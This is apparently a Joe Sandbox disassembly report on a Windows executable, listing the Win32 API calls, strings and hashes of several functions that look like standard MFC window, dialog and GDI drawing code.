lstrlenA.KERNEL32(?,0000F108,?,00000100,8lE,0045B7F8), ref: 0044D6AA
MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,?), ref: 0044D6CF
SysAllocString.OLEAUT32(?), ref: 0044D6D5
lstrlenA.KERNEL32(?,?,?), ref: 0044D6FA
MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,?,?,?), ref: 0044D71F
SysAllocString.OLEAUT32(?), ref: 0044D725
lstrlenA.KERNEL32(?,?,?), ref: 0044D751
MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000001,?,?), ref: 0044D774
SysAllocString.OLEAUT32(00000000), ref: 0044D77A

Strings

8lE, xrefs: 0044D65E

Memory Dump Source

Source File: 00000000.00000002.1491337446.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1491319679.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491373171.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.0000000000468000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046F000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491454931.0000000000470000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ExeFile (360).jbxd

Similarity

API ID: AllocByteCharMultiStringWidelstrlen
String ID: 8lE
API String ID: 792254170-449313934
Opcode ID: eb982190422a0cef95341e947b988722db434bea6785c924eb11569cf385f534
Instruction ID: eecc2ee5df555b45d7227599e401203dbad63a19bc9c21242a2ef053462cdd26
Opcode Fuzzy Hash: eb982190422a0cef95341e947b988722db434bea6785c924eb11569cf385f534
Instruction Fuzzy Hash: 48713970900208EFCB11DFA5CC419AEBBB4FF09364B11845AF819DB351D739DA82CBA9

Function 00432C4E Relevance: 26.4, APIs: 13, Strings: 2, Instructions: 174windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00433753: GetWindowLongA.USER32(?,000000F0), ref: 0043375F

GetParent.USER32(?), ref: 00432C79
SendMessageA.USER32(00000000,0000036B,00000000,00000000), ref: 00432C9C
GetWindowRect.USER32(?,?), ref: 00432CB5
GetWindowLongA.USER32(00000000,000000F0), ref: 00432CC8
CopyRect.USER32(?,?), ref: 00432D15
CopyRect.USER32(?,?), ref: 00432D1F
GetWindowRect.USER32(00000000,?), ref: 00432D28
CopyRect.USER32(?,?), ref: 00432D44

Strings

@, xrefs: 00432CB7
(, xrefs: 00432CE0

Memory Dump Source

Source File: 00000000.00000002.1491337446.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1491319679.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491373171.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.0000000000468000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046F000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491454931.0000000000470000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ExeFile (360).jbxd

Similarity

API ID: Rect$Window$Copy$Long$MessageParentSend
String ID: ($@
API String ID: 808654186-1311469180
Opcode ID: 5debeb0bec1f999b14f86e5912ea4be30eb904eafbd7f57f28cc229845220c8b
Instruction ID: 852405326da57dfe14cd533d492970ae8df7ae28e1dcd2f2b55c9ee6e340387c
Opcode Fuzzy Hash: 5debeb0bec1f999b14f86e5912ea4be30eb904eafbd7f57f28cc229845220c8b
Instruction Fuzzy Hash: 77519172900609AFDB00DBA8CD85FEEBBB9AF48311F145126F901F3281DA78ED458B58

Function 0040AFF0 Relevance: 25.8, APIs: 17, Instructions: 310COMMON

Download Yara Rule

APIs

Part of subcall function 00405F10: KiUserCallbackDispatcher.NTDLL(00001024,00000000,?,00000000), ref: 00405F27

GetWindowRect.USER32(?,?), ref: 0040B00E
GetWindowDC.USER32(00000000), ref: 0040B032
GetPixel.GDI32(00000000,?,00000000), ref: 0040B0A9
SetPixel.GDI32(?,?,00000000,00000000), ref: 0040B0B7
GetPixel.GDI32(00000000,?,00000004), ref: 0040B0E8
SetPixel.GDI32(?,?,?,00000000), ref: 0040B104
GetPixel.GDI32(00000000,?,00000008), ref: 0040B147
SetPixel.GDI32(?,?,?,00000000), ref: 0040B163
GetPixel.GDI32(00000000,?,?), ref: 0040B1B1
SetPixel.GDI32(?,?,?,00000000), ref: 0040B1D3
GetPixel.GDI32(00000000,00000000,?), ref: 0040B28A
SetPixel.GDI32(?,?,00000008,00000000), ref: 0040B298
GetPixel.GDI32(00000000,00000004,?), ref: 0040B2C9
SetPixel.GDI32(?,?,?,00000000), ref: 0040B2E5
GetPixel.GDI32(00000000,00000008,?), ref: 0040B328
SetPixel.GDI32(?,?,?,00000000), ref: 0040B344
ReleaseDC.USER32(00000000,00000000), ref: 0040B385

Memory Dump Source

Source File: 00000000.00000002.1491337446.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1491319679.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491373171.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.0000000000468000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046F000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491454931.0000000000470000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ExeFile (360).jbxd

Similarity

API ID: Pixel$Window$CallbackDispatcherRectReleaseUser
String ID:
API String ID: 3730408152-0
Opcode ID: 50477cfe532e373303b775c18f05ae80d4c325fd5a5ec19a8ff7a2a210021bf6
Instruction ID: 707b83fd0136bd6d59d88db8912f6235be1bc4b3f4397dfc35245a452532df5c
Opcode Fuzzy Hash: 50477cfe532e373303b775c18f05ae80d4c325fd5a5ec19a8ff7a2a210021bf6
Instruction Fuzzy Hash: A7C19FB06083419FD304CF58C894A2BF7E9FBC8704F548A1DF89597351DBB8E9098B9A

Function 004503A0 Relevance: 25.6, APIs: 17, Instructions: 82windowCOMMON

Download Yara Rule

APIs

GetStockObject.GDI32(00000007), ref: 004503B8
SelectObject.GDI32(00000000,00000000), ref: 004503C4
SelectObject.GDI32(00000000,00000000), ref: 004503CC
SelectObject.GDI32(00000000,00000000), ref: 004503D2
GetStockObject.GDI32(00000004), ref: 004503D6
SelectObject.GDI32(00000000,00000000), ref: 004503DC
SelectObject.GDI32(00000000,00000000), ref: 004503E4
SelectObject.GDI32(00000000,00000000), ref: 004503EA
GetROP2.GDI32(00000000), ref: 004503EF

Part of subcall function 00438543: SetROP2.GDI32(?,?), ref: 0043855C
Part of subcall function 00438543: SetROP2.GDI32(?,?), ref: 0043856A

GetBkMode.GDI32(00000000,?,?,?,?,00450264,00000000), ref: 00450400

Part of subcall function 004384E7: SetBkMode.GDI32(?,?), ref: 00438500
Part of subcall function 004384E7: SetBkMode.GDI32(?,?), ref: 0043850E

GetTextAlign.GDI32(00000000), ref: 00450411

Part of subcall function 0043897D: SetTextAlign.GDI32(?,?), ref: 00438998
Part of subcall function 0043897D: SetTextAlign.GDI32(?,?), ref: 004389A6

GetPolyFillMode.GDI32(00000000,?,?,?,?,00450264,00000000), ref: 00450422

Part of subcall function 00438515: SetPolyFillMode.GDI32(?,?), ref: 0043852E
Part of subcall function 00438515: SetPolyFillMode.GDI32(?,?), ref: 0043853C

GetStretchBltMode.GDI32(00000000,?,?,?,?,00450264,00000000), ref: 00450433

Part of subcall function 00438571: SetStretchBltMode.GDI32(?,?), ref: 0043858A
Part of subcall function 00438571: SetStretchBltMode.GDI32(?,?), ref: 00438598

GetTextColor.GDI32(00000000), ref: 00450444
GetNearestColor.GDI32(00000000,00000000,?,?,?,?,00450264,00000000), ref: 00450454
GetBkColor.GDI32(00000000), ref: 00450461
GetNearestColor.GDI32(00000000,00000000,?,?,?,?,00450264,00000000), ref: 0045046B

Memory Dump Source

Source File: 00000000.00000002.1491337446.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1491319679.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491373171.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.0000000000468000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046F000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491454931.0000000000470000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ExeFile (360).jbxd

Similarity

API ID: Mode$Object$Select$ColorText$AlignFillPolyStretch$NearestStock
String ID:
API String ID: 1751264856-0
Opcode ID: 86fe85a2c658ebe0f017fce6880b68e1d24283aa02b7b66e1dd5e4dac86c47c7
Instruction ID: 4e4c80d35ee0290cd194635c53ac91f2141de5a8ef50102dd76a71e06181b7d0
Opcode Fuzzy Hash: 86fe85a2c658ebe0f017fce6880b68e1d24283aa02b7b66e1dd5e4dac86c47c7
Instruction Fuzzy Hash: F8212C71100E05BFCA217B66DC18E2FBEAAEF887057018429F15A81532CF25AC52DB68

Function 0044E836 Relevance: 24.8, APIs: 13, Strings: 1, Instructions: 332COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 0044E83B
GetViewportOrgEx.GDI32(?,?), ref: 0044E866
GetSysColor.USER32(00000006), ref: 0044E88D
CreatePen.GDI32(00000000,00000002,00000000), ref: 0044E894
GetSysColor.USER32(00000010), ref: 0044E8B4
CreatePen.GDI32(00000000,00000003,00000000), ref: 0044E8BC
GetDeviceCaps.GDI32(?,0000000A), ref: 0044E95A
GetDeviceCaps.GDI32(?,00000008), ref: 0044E967
SetRect.USER32(?,00000000,00000000,00000000,?), ref: 0044E97B
DPtoLP.GDI32(?,?,00000002), ref: 0044E993
Rectangle.GDI32(00000001,74064620,?,?,?), ref: 0044EA31

Part of subcall function 00438472: SelectObject.GDI32(?,00000000), ref: 00438494
Part of subcall function 00438472: SelectObject.GDI32(?,?), ref: 004384AA

Part of subcall function 004388FC: MoveToEx.GDI32(?,?,?,?), ref: 0043891E
Part of subcall function 004388FC: MoveToEx.GDI32(?,?,?,?), ref: 00438932

Part of subcall function 00438948: MoveToEx.GDI32(?,?,?,00000000), ref: 00438962
Part of subcall function 00438948: LineTo.GDI32(?,?,?), ref: 00438973

GetStockObject.GDI32(00000000), ref: 0044EAA8
FillRect.USER32(00000001,00000000,00000000), ref: 0044EAB9

Part of subcall function 0045105C: GetViewportExtEx.GDI32(?,?,?,?,?,00450F86,?), ref: 0045106D
Part of subcall function 0045105C: GetWindowExtEx.GDI32(?,?,?,?,?,00450F86,?), ref: 0045107A

Part of subcall function 00450FDA: GetDeviceCaps.GDI32(?,0000000A), ref: 00450FEF
Part of subcall function 00450FDA: GetDeviceCaps.GDI32(?,00000008), ref: 00450FF8
Part of subcall function 00450FDA: SetMapMode.GDI32(?,00000001), ref: 00451010
Part of subcall function 00450FDA: SetWindowOrgEx.GDI32(?,00000000,00000000,00000000), ref: 0045101E
Part of subcall function 00450FDA: SetViewportOrgEx.GDI32(?,?,?,00000000), ref: 0045102E
Part of subcall function 00450FDA: IntersectClipRect.GDI32(?,000000FF,000000FF,?,?), ref: 00451049

Strings

(, xrefs: 0044EB8C

Memory Dump Source

Source File: 00000000.00000002.1491337446.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1491319679.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491373171.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.0000000000468000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046F000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491454931.0000000000470000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ExeFile (360).jbxd

Similarity

API ID: CapsDevice$MoveObjectRectViewport$ColorCreateSelectWindow$ClipFillH_prologIntersectLineModeRectangleStock
String ID: (
API String ID: 14264375-3887548279
Opcode ID: ae7afcbce1ce399d223858a8b5dc3ba95ab1d16ed9e642a5ee216ce734301ffc
Instruction ID: c3830129a7b9304ca9b2cba4960533738a26a5a6f9942ad5dc3e113bd483a4d7
Opcode Fuzzy Hash: ae7afcbce1ce399d223858a8b5dc3ba95ab1d16ed9e642a5ee216ce734301ffc
Instruction Fuzzy Hash: 24D12871A00209DFDB14DFA4C985EAEBBB5FF48304F14416AF916AB262CB35AD41CF64

Function 0043C925 Relevance: 24.6, APIs: 13, Strings: 1, Instructions: 132windowCOMMON

Download Yara Rule

APIs

LoadResource.KERNEL32(?,?), ref: 0043C934
LockResource.KERNEL32(00000000), ref: 0043C93F
GetSysColor.USER32 ref: 0043C9C1
GetSysColor.USER32(00000000), ref: 0043C9CF
GetSysColor.USER32(?), ref: 0043C9DF
GetDC.USER32(00000000), ref: 0043CA05
CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 0043CA11
CreateCompatibleDC.GDI32(00000000), ref: 0043CA21
SelectObject.GDI32(00000000,?), ref: 0043CA33
StretchDIBits.GDI32(00000000,00000000,00000000,?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,00CC0020), ref: 0043CA62
SelectObject.GDI32(00000000,00000000), ref: 0043CA6C
DeleteDC.GDI32(00000000), ref: 0043CA6F
ReleaseDC.USER32(00000000,00000000), ref: 0043CA7A

Strings

DllGetVersion, xrefs: 0043C98E

Memory Dump Source

Source File: 00000000.00000002.1491337446.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1491319679.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491373171.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.0000000000468000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046F000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491454931.0000000000470000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ExeFile (360).jbxd

Similarity

API ID: Color$CompatibleCreateObjectResourceSelect$BitmapBitsDeleteLoadLockReleaseStretch
String ID: DllGetVersion
API String ID: 257281507-2861820592
Opcode ID: ad034441acc44c5b71394bfdc42d07a4b6cead36ddf1bb1139434a407bf34f21
Instruction ID: 15d8a94728e4d87c4fa79baf63c6c639bd0564d8767c5d798ba39357c0bd9527
Opcode Fuzzy Hash: ad034441acc44c5b71394bfdc42d07a4b6cead36ddf1bb1139434a407bf34f21
Instruction Fuzzy Hash: 2441AEB2500704FFDB119F64DCD4BAE3BB9EF49312F15802AF90596261D738D911DB68

Function 00412236 Relevance: 24.6, APIs: 7, Strings: 7, Instructions: 68libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(USER32,?,?,?,0041236F), ref: 00412258
GetProcAddress.KERNEL32(00000000,GetSystemMetrics), ref: 00412270
GetProcAddress.KERNEL32(00000000,MonitorFromWindow), ref: 00412281
GetProcAddress.KERNEL32(00000000,MonitorFromRect), ref: 00412292
GetProcAddress.KERNEL32(00000000,MonitorFromPoint), ref: 004122A3
GetProcAddress.KERNEL32(00000000,EnumDisplayMonitors), ref: 004122B4
GetProcAddress.KERNEL32(00000000,GetMonitorInfoA), ref: 004122C5

Strings

MonitorFromRect, xrefs: 0041228C
GetSystemMetrics, xrefs: 0041226A
EnumDisplayMonitors, xrefs: 004122AE
MonitorFromWindow, xrefs: 0041227B
MonitorFromPoint, xrefs: 0041229D
USER32, xrefs: 00412253
GetMonitorInfoA, xrefs: 004122BF

Memory Dump Source

Source File: 00000000.00000002.1491337446.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1491319679.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491373171.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.0000000000468000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046F000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491454931.0000000000470000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ExeFile (360).jbxd

Similarity

API ID: AddressProc$HandleModule
String ID: EnumDisplayMonitors$GetMonitorInfoA$GetSystemMetrics$MonitorFromPoint$MonitorFromRect$MonitorFromWindow$USER32
API String ID: 667068680-2376520503
Opcode ID: 04a14a12c73e57ea9a9a8372da64eacd61a8ac312149aa40d410d9441c7e38da
Instruction ID: 94ad51739b6883979c762eaf2b7fe361fbe1772218a5854bb71d1ce64a9b92aa
Opcode Fuzzy Hash: 04a14a12c73e57ea9a9a8372da64eacd61a8ac312149aa40d410d9441c7e38da
Instruction Fuzzy Hash: 24113670F00215AB83019F266DC1AEEBAE4B34E742360443FD405D26A1EFF844D69F1E

Function 00419965 Relevance: 24.3, APIs: 16, Instructions: 319windowkeyboardCOMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 0041996A
GetFocus.USER32 ref: 00419978
GetParent.USER32(?), ref: 004199EE
GetParent.USER32(?), ref: 004199FE
GetKeyState.USER32(00000012), ref: 00419AB4
IsDialogMessageA.USER32(?,?,00000000,?,?,00000000), ref: 00419B70
GetFocus.USER32 ref: 00419B82
GetFocus.USER32 ref: 00419B8F
IsWindow.USER32(?), ref: 00419BA7
GetFocus.USER32 ref: 00419BB3
IsWindow.USER32(?), ref: 00419BC9
GetFocus.USER32 ref: 00419BCF
GetKeyState.USER32(00000010), ref: 00419C00
GetNextDlgTabItem.USER32(?,00000000,00000000), ref: 00419C1F
MessageBeep.USER32(00000000), ref: 00419CB5

Memory Dump Source

Source File: 00000000.00000002.1491337446.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1491319679.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491373171.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.0000000000468000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046F000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491454931.0000000000470000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ExeFile (360).jbxd

Similarity

API ID: Focus$MessageParentStateWindow$BeepDialogH_prologItemNext
String ID:
API String ID: 1894107442-0
Opcode ID: e54de24a79a299e97e6bc9d18ecb51877a6b3d4192fd595a2e7f02f3d2574ad3
Instruction ID: d3d8fef154a23518f40b2b7b51c16c019a7e07a1797a7d1884fe1a4c25fabac7
Opcode Fuzzy Hash: e54de24a79a299e97e6bc9d18ecb51877a6b3d4192fd595a2e7f02f3d2574ad3
Instruction Fuzzy Hash: 30A1A131A04205AADF24AF65D9A5AFF7BA9AF04354F14001BE805AB261E73DECC1C79D

Function 00447639 Relevance: 24.2, APIs: 16, Instructions: 177windowCOMMON

Download Yara Rule

APIs

GetDlgCtrlID.USER32(?), ref: 0044767D
GetDlgItem.USER32(?,?), ref: 0044771A
ShowWindow.USER32(00000000,00000000), ref: 00447722
GetMenu.USER32(?), ref: 0044772B
InvalidateRect.USER32(?,00000000,00000001), ref: 0044773E
SetMenu.USER32(?,00000000), ref: 00447748
GetDlgItem.USER32(?,0000E900), ref: 00447777
SetWindowLongA.USER32(?,000000F4,0000EA21), ref: 0044778F
GetDlgItem.USER32(?,0000EA21), ref: 004477AE
GetDlgItem.USER32(?,0000E900), ref: 004477C1
SetWindowLongA.USER32(00000000,000000F4,0000EA21), ref: 004477CF
SetWindowLongA.USER32(?,000000F4,0000E900), ref: 004477DC
InvalidateRect.USER32(?,00000000,00000001), ref: 004477EF
SetMenu.USER32(?,00000000), ref: 004477FB
GetDlgItem.USER32(?,00000000), ref: 00447829
ShowWindow.USER32(?,00000005), ref: 00447835

Memory Dump Source

Source File: 00000000.00000002.1491337446.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1491319679.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491373171.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.0000000000468000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046F000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491454931.0000000000470000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ExeFile (360).jbxd

Similarity

API ID: ItemWindow$LongMenu$InvalidateRectShow$Ctrl
String ID:
API String ID: 461998371-0
Opcode ID: 5601a2bc7e67c9545a7ec913b709f17d5343b8a7d474bc079c6af7026a521bfa
Instruction ID: e22374085d0a488db891f079c976f04f6af3031423098860fadd5deebfcc7104
Opcode Fuzzy Hash: 5601a2bc7e67c9545a7ec913b709f17d5343b8a7d474bc079c6af7026a521bfa
Instruction Fuzzy Hash: 46618C70604B01AFEB209F28CC88A2ABBF5FF08315F104A2EF55A972A1D775EC55CB55

Function 0040C210 Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 123COMMON

Download Yara Rule

APIs

GetClassNameA.USER32(?,?,00000014), ref: 0040C220
GetWindowLongA.USER32(?,000000FC), ref: 0040C26A
GetPropA.USER32(?,OldMenuProc), ref: 0040C282
SetPropA.USER32(?,OldMenuProc,00000000), ref: 0040C293
GetPropA.USER32(?,OldMenuProc), ref: 0040C2A8
GlobalAddAtomA.KERNEL32(OldMenuProc), ref: 0040C2B7
GetWindowLongA.USER32(?,000000F0), ref: 0040C305
GetWindowLongA.USER32(?,000000EC), ref: 0040C30C
SetLastError.KERNEL32(00000000,?,?,?,?,00000014), ref: 0040C323
SetWindowLongA.USER32(?,000000FC,Function_0000BDF0), ref: 0040C331

Part of subcall function 00405E30: GetLastError.KERNEL32(00000000,000000FF,00405D41), ref: 00405E49
Part of subcall function 00405E30: FormatMessageA.KERNEL32 ref: 00405E77
Part of subcall function 00405E30: MessageBoxA.USER32(00000000,?,Error,00000040), ref: 00405E8F
Part of subcall function 00405E30: LocalFree.KERNEL32(?), ref: 00405E9A

Strings

@iE, xrefs: 0040C316
#32768, xrefs: 0040C233
OldMenuProc, xrefs: 0040C27C, 0040C28D, 0040C2A2, 0040C2B2

Memory Dump Source

Source File: 00000000.00000002.1491337446.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1491319679.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491373171.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.0000000000468000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046F000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491454931.0000000000470000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ExeFile (360).jbxd

Similarity

API ID: LongWindow$Prop$ErrorLastMessage$AtomClassFormatFreeGlobalLocalName
String ID: #32768$@iE$OldMenuProc
API String ID: 3417262356-2398661284
Opcode ID: ccce614f8d92c4cce7316e5c401cbff2a0503ff2376ae57072ea109cfd01b620
Instruction ID: 4e75bb51348606fcd0dfb07b1e4fe54337fb0593d6ee1e40f4c459919493c863
Opcode Fuzzy Hash: ccce614f8d92c4cce7316e5c401cbff2a0503ff2376ae57072ea109cfd01b620
Instruction Fuzzy Hash: DC41C671500300AFD320AF669C85A2BB7A8DF55719B50833EFD05E2292EB78D8048BDE

Function 0042D39B Relevance: 22.9, APIs: 7, Strings: 6, Instructions: 114windowregistryCOMMON

Download Yara Rule

APIs

Part of subcall function 0044B122: TlsGetValue.KERNEL32(0046D38C,?,00000000,004490F7,0044879C,00449113,0043427A,00436840,?,00000000,?,0042B77C,00000000,00000000,00000000,00000000), ref: 0044B161

RegisterWindowMessageA.USER32(commdlg_LBSelChangedNotify,Function_0004879C), ref: 0042D3E6
RegisterWindowMessageA.USER32(commdlg_ShareViolation), ref: 0042D3F2
RegisterWindowMessageA.USER32(commdlg_FileNameOK), ref: 0042D3FE
RegisterWindowMessageA.USER32(commdlg_ColorOK), ref: 0042D40A
RegisterWindowMessageA.USER32(commdlg_help), ref: 0042D416
RegisterWindowMessageA.USER32(commdlg_SetRGBColor), ref: 0042D422

Part of subcall function 00433579: SetWindowLongA.USER32(?,000000FC,00000000), ref: 004335A8

SendMessageA.USER32(00000000,00000111,0000E146,00000000), ref: 0042D515

Strings

commdlg_help, xrefs: 0042D40C
commdlg_FileNameOK, xrefs: 0042D3F4
commdlg_LBSelChangedNotify, xrefs: 0042D3E1
commdlg_ShareViolation, xrefs: 0042D3E8
commdlg_ColorOK, xrefs: 0042D400
commdlg_SetRGBColor, xrefs: 0042D418

Memory Dump Source

Source File: 00000000.00000002.1491337446.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1491319679.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491373171.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.0000000000468000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046F000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491454931.0000000000470000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ExeFile (360).jbxd

Similarity

API ID: MessageWindow$Register$LongSendValue
String ID: commdlg_ColorOK$commdlg_FileNameOK$commdlg_LBSelChangedNotify$commdlg_SetRGBColor$commdlg_ShareViolation$commdlg_help
API String ID: 2377901579-3888057576
Opcode ID: c42eacf1b600d4db241be7c93411df8fa3b497c8290810ff6fc771061ca22cc8
Instruction ID: 62c970dafd3c146036d65fff75fe769495568ff7fefc19e25242430907da490a
Opcode Fuzzy Hash: c42eacf1b600d4db241be7c93411df8fa3b497c8290810ff6fc771061ca22cc8
Instruction Fuzzy Hash: 9E418670F00224ABDF24AF25EC45B6E3BA1EB48355F50442BF80957261D7F8AC94CB9E

Function 00429030 Relevance: 22.8, APIs: 6, Strings: 7, Instructions: 44stringCOMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(0046F280,753D4920,76F8B510,?,?,?,?,?,?,?,?,?,?,?,?,00428647), ref: 00429047
GetProfileStringA.KERNEL32(windows,kanjimenu,roman,?,00000009), ref: 00429070
lstrcmpiA.KERNEL32(?,kanji), ref: 00429082
GetProfileStringA.KERNEL32(windows,hangeulmenu,english,?,00000009), ref: 004290A5
lstrcmpiA.KERNEL32(?,hangeul), ref: 004290B1
LeaveCriticalSection.KERNEL32(0046F280,?,?,?,?,?,?,?,?,?,?,?,?,00428647), ref: 004290C3

Strings

hangeulmenu, xrefs: 0042909B
windows, xrefs: 0042906B, 004290A0
roman, xrefs: 00429061
english, xrefs: 00429096
kanjimenu, xrefs: 00429066
hangeul, xrefs: 004290AB
kanji, xrefs: 00429076

Memory Dump Source

Source File: 00000000.00000002.1491337446.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1491319679.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
